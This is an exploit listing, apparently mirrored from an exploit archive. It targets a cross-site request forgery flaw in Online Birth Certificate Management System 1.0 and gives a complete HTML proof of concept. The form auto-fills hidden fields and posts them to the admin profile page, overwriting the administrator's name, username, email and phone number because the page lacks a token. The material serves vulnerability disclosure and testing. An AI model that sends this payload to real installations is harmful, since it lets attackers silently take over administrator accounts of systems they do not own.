Exploit for Online Birth Certificate Management System 1.0 Cross Site Request Forgery

Name: Exploit for Online Birth Certificate Management System 1.0 Cross Site Request Forgery
Rating: 5 (168 reviews)

2022-09-27 | CVSS -0.2

## https://sploitus.com/exploit?id=PACKETSTORM:168522
# Exploit Title: Online Birth Certificate Management System - Cross Site Request Forgery (CSRF)  
# Google Dork: N/A  
# Date: 2022-9-27  
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11  
# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip  
# Tested on: windows 11 - XAMPP  
# CVE : N/A  
# Version: 1.0  
  
# no token in update profile admin  
  
<html>  
<head>  
<title> CSRF update Profile </title>  
</head>  
<body>  
<form action="http://localhost/OBCMS/admin/profile.php" method="post" enctype="multipart/form-data">  
<input type="hidden" name="adminname" value="csrf111">  
<input type="hidden" name="username" value="csrf">  
<input type="hidden" name="email" value="csrf">  
<input type="hidden" name="mobilenumber" value="0">  
<button class="btn btn-sm btn-primary login-submit-cs" type="submit" name="submit">Save Change</button>  
</form>  
</body>  
</html>